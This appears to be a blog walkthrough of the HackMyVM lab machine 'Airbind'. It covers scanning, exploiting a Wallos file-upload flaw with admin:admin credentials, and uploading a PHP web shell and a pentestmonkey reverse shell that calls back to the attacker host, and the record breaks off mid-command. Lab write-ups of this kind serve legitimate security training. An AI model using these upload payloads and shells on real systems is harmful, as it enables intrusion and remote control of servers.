{"id":821,"date":"2025-03-20T22:30:20","date_gmt":"2025-03-20T14:30:20","guid":{"rendered":"http:\/\/162.14.82.114\/?p=821"},"modified":"2025-03-20T22:30:20","modified_gmt":"2025-03-20T14:30:20","slug":"hmv-_-airbind","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/821\/03\/20\/2025\/","title":{"rendered":"hmv[-_-]Airbind"},"content":{"rendered":"<h1>Airbind<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229354.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229354.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240912140731229\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229356.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229356.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240912143633016\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<p>At a glance that is my own router... It seems the machine got mixed up, so I tried re-importing it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229357.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229357.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213224256153\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>It still did not show up in the scan, so I kept trying. I re-imported it and doubled the CPU and memory, but it still did not work... Then I changed the network adapter to bridged mode and it worked!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229358.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229358.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214105313554\" 
style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ IP=10.0.2.21           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 10.0.2.21:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack Apache httpd 2.4.57 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.57 (Ubuntu)\n| http-title: Wallos - Subscription Tracker\n|_Requested resource was login.php\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\n|_http-favicon: Unknown favicon MD5: 81452C705B6AAB657F745B6FB4966367<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 1 -s 200 301 302 \n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.10.4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/10.0.2.21\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.4\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion 
Depth       \u2502 1\n \ud83c\udf89  New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n302      GET        0l        0w        0c http:\/\/10.0.2.21\/ =&gt; login.php\n301      GET        9l       28w      307c http:\/\/10.0.2.21\/images =&gt; http:\/\/10.0.2.21\/images\/\n301      GET        9l       28w      308c http:\/\/10.0.2.21\/scripts =&gt; http:\/\/10.0.2.21\/scripts\/\n301      GET        9l       28w      312c http:\/\/10.0.2.21\/screenshots =&gt; http:\/\/10.0.2.21\/screenshots\/\n301      GET        9l       28w      309c http:\/\/10.0.2.21\/includes =&gt; http:\/\/10.0.2.21\/includes\/\n301      GET        9l       28w      303c http:\/\/10.0.2.21\/db =&gt; http:\/\/10.0.2.21\/db\/\n301      GET        9l       28w      307c http:\/\/10.0.2.21\/styles =&gt; http:\/\/10.0.2.21\/styles\/\n301      GET        9l       28w      305c http:\/\/10.0.2.21\/libs =&gt; http:\/\/10.0.2.21\/libs\/\n[###&gt;----------------] - 5m     36589\/220553  27m     found:8       errors:2      \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_10_0_2_21-1734145306.state ...\n[###&gt;----------------] - 5m     36589\/220553  27m     found:8       errors:2      \n[###&gt;----------------] - 5m     36575\/220546  114\/s   
http:\/\/10.0.2.21\/<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ whatweb http:\/\/$IP                            \nhttp:\/\/10.0.2.21 [302 Found] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[10.0.2.21], RedirectLocation[login.php]\nhttp:\/\/10.0.2.21\/login.php [200 OK] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[10.0.2.21], PasswordField[password], Title[Wallos - Subscription Tracker]<\/code><\/pre>\n<p>This looks like a known application, so I searched for it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229359.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229359.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214105749024\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I need to check whether the version number matches:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl -s http:\/\/$IP\/login.php                                                   \n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; 
content=&quot;width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no&quot;&gt;\n    &lt;meta name=&quot;theme-color&quot; content=&quot;#FFFFFF&quot;\/&gt;\n    &lt;title&gt;Wallos - Subscription Tracker&lt;\/title&gt;\n    &lt;link rel=&quot;icon&quot; type=&quot;image\/png&quot; href=&quot;images\/icon\/favicon.ico&quot; sizes=&quot;16x16&quot;&gt;\n    &lt;link rel=&quot;apple-touch-icon&quot; sizes=&quot;180x180&quot; href=&quot;images\/icon\/apple-touch-icon.png&quot;&gt;\n    &lt;link rel=&quot;manifest&quot; href=&quot;manifest.json&quot;&gt;\n    &lt;link rel=&quot;stylesheet&quot; href=&quot;styles\/login.css?v1.11.0&quot;&gt;\n    &lt;link rel=&quot;stylesheet&quot; href=&quot;styles\/barlow.css&quot;&gt;\n    &lt;link rel=&quot;stylesheet&quot; href=&quot;styles\/login-dark-theme.css?v1.11.0&quot; id=&quot;dark-theme&quot; disabled&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;div class=&quot;content&quot;&gt;\n        &lt;section class=&quot;container&quot;&gt;\n            &lt;header&gt;\n                 &lt;img src=&quot;images\/wallossolid.png&quot; alt=&quot;Wallos Logo&quot; title=&quot;Wallos - Subscription Tracker&quot; \/&gt;                 &lt;p&gt;\n                    Please login                &lt;\/p&gt;\n            &lt;\/header&gt;\n            &lt;form action=&quot;login.php&quot; method=&quot;post&quot;&gt;\n                &lt;div class=&quot;form-group&quot;&gt;\n                    &lt;label for=&quot;username&quot;&gt;Username:&lt;\/label&gt;\n                    &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; required&gt;\n                &lt;\/div&gt;\n                &lt;div class=&quot;form-group&quot;&gt;\n                    &lt;label for=&quot;password&quot;&gt;Password:&lt;\/label&gt;\n                    &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; required&gt;\n                &lt;\/div&gt;\n                &lt;div 
class=&quot;form-group-inline&quot;&gt;\n                    &lt;input type=&quot;checkbox&quot; id=&quot;remember&quot; name=&quot;remember&quot;&gt;\n                    &lt;label for=&quot;remember&quot;&gt;Stay logged in (30 days)&lt;\/label&gt;\n                &lt;\/div&gt;\n                                &lt;div class=&quot;form-group&quot;&gt;\n                    &lt;input type=&quot;submit&quot; value=&quot;Login&quot;&gt;\n                &lt;\/div&gt;\n            &lt;\/form&gt;\n        &lt;\/section&gt;\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;                <\/code><\/pre>\n<p>The version appears to be <code>1.11.0<\/code>, so I tried to exploit it!<\/p>\n<h3>Exploiting the File Upload Vulnerability<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ searchsploit -m php\/webapps\/51924.txt\n  Exploit: Wallos &lt; 1.11.2 - File Upload RCE\n      URL: https:\/\/www.exploit-db.com\/exploits\/51924\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/51924.txt\n    Codes: N\/A\n Verified: False\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/Airbind\/51924.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ls\n51924.txt  ferox-http_10_0_2_21-1734144980.state\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ cat 51924.txt               \n# Exploit Title: Wallos - File Upload RCE (Authenticated)\n# Date: 2024-03-04\n# Exploit Author: sml@lacashita.com\n# Vendor Homepage: https:\/\/github.com\/ellite\/Wallos\n# Software Link: https:\/\/github.com\/ellite\/Wallos\n# Version: &lt; 1.11.2\n# Tested on: Debian 12\n\nWallos allows you to upload an image\/logo when you create a new subscription.\nThis can be bypassed to upload a malicious .php file.\n\nPOC\n---\n\n1) Log into the application.\n2) Go to &quot;New Subscription&quot;\n3) Upload Logo and choose your webshell 
.php\n4) Make the Request changing Content-Type to image\/jpeg and adding &quot;GIF89a&quot;, it should be like:\n\n--- SNIP -----------------\n\nPOST \/endpoints\/subscription\/add.php HTTP\/1.1\n\nHost: 192.168.1.44\n\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0\n\nAccept: *\/*\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate\n\nReferer: http:\/\/192.168.1.44\/\n\nContent-Type: multipart\/form-data; boundary=---------------------------29251442139477260933920738324\n\nOrigin: http:\/\/192.168.1.44\n\nContent-Length: 7220\n\nConnection: close\n\nCookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name=&quot;name&quot;\n\ntest\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name=&quot;logo&quot;; filename=&quot;revshell.php&quot;\n\nContent-Type: image\/jpeg\n\nGIF89a;\n\n&lt;?php\nsystem($_GET[&#039;cmd&#039;]);\n?&gt;\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name=&quot;logo-url&quot;\n\n----- SNIP -----\n\n5) You will get the response that your file was uploaded ok:\n\n{&quot;status&quot;:&quot;Success&quot;,&quot;message&quot;:&quot;Subscription updated successfully&quot;}\n\n6) Your file will be located in:\nhttp:\/\/VICTIM_IP\/images\/uploads\/logos\/XXXXXX-yourshell.php   <\/code><\/pre>\n<h4>Weak Password<\/h4>\n<p>I tried to follow the PoC, but I had no username or password. Trying weak credentials, I found that <code>admin:admin<\/code> logs in normally.<\/p>\n<p>This was actually leaked as well, but I had not noticed it earlier:<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229360.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229360.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214110824890\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl -s http:\/\/10.0.2.21\/db\/ | html2text\n****** Index of \/db ******\n[[ICO]]       Name             Last_modified    Size Description\n===========================================================================\n[[PARENTDIR]] Parent_Directory                    -  \n[[   ]]       wallos.db        2024-12-14 03:05  64K  \n===========================================================================\n     Apache\/2.4.57 (Ubuntu) Server at 10.0.2.21 Port 80\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ wget http:\/\/10.0.2.21\/db\/wallos.db            \n--2024-12-13 22:09:59--  http:\/\/10.0.2.21\/db\/wallos.db\nConnecting to 10.0.2.21:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 65536 (64K)\nSaving to: \u2018wallos.db\u2019\n\nwallos.db                                       100%[====================================================================================================&gt;]  64.00K  --.-KB\/s    in 0.003s  \n\n2024-12-13 22:10:00 (21.1 MB\/s) - \u2018wallos.db\u2019 saved [65536\/65536]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ sqlite3 wallos.db\nSQLite version 3.45.1 2024-01-30 16:01:20\nEnter &quot;.help&quot; for usage hints.\nsqlite&gt; .tables\ncategories                     login_tokens                 \ncurrencies                     migrations                   \ncycles                         notifications                \nfixer                          payment_methods              \nfrequencies                    settings                     \nhousehold                      subscriptions                \nlast_exchange_update           user                         \nlast_update_next_payment_date\nsqlite&gt; select * from user;\n1|admin|admin@localhost.com|$2y$10$2XxuEupev6gU1qWoURsIYu7XHNiy7nve9iq7H0mUX\/MzFnmvbxC9S|1|0|en<\/code><\/pre>\n<p>Looking it up, it is also <code>admin<\/code>.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229361.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229361.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214112004836\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229362.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229362.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214112012516\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>Intercepting and Modifying the Request<\/h4>\n<p>First, prepare a reverse shell!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ vim shell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ head shell.php                                                                  \nGIF89a;\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.103&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>Then add a subscription!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229363.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229363.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214113232682\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Modify the request:<\/p>\n<pre><code class=\"language-bash\">Content-Type: application\/x-php\n\nContent-Type: image\/jpeg<\/code><\/pre>\n<p>Then save it and visit it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229364.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229364.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214113328593\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229365.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229365.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214113737918\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Then try visiting it to trigger it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229366.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229366.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214113845713\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>But that did not work, so I fell back to a plain one-line web shell...<\/p>\n<pre><code class=\"language-bash\">GIF89a;\n\n&lt;?php\nsystem($_GET[&#039;cmd&#039;]);\n?&gt;<\/code><\/pre>\n<p>Try again!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl 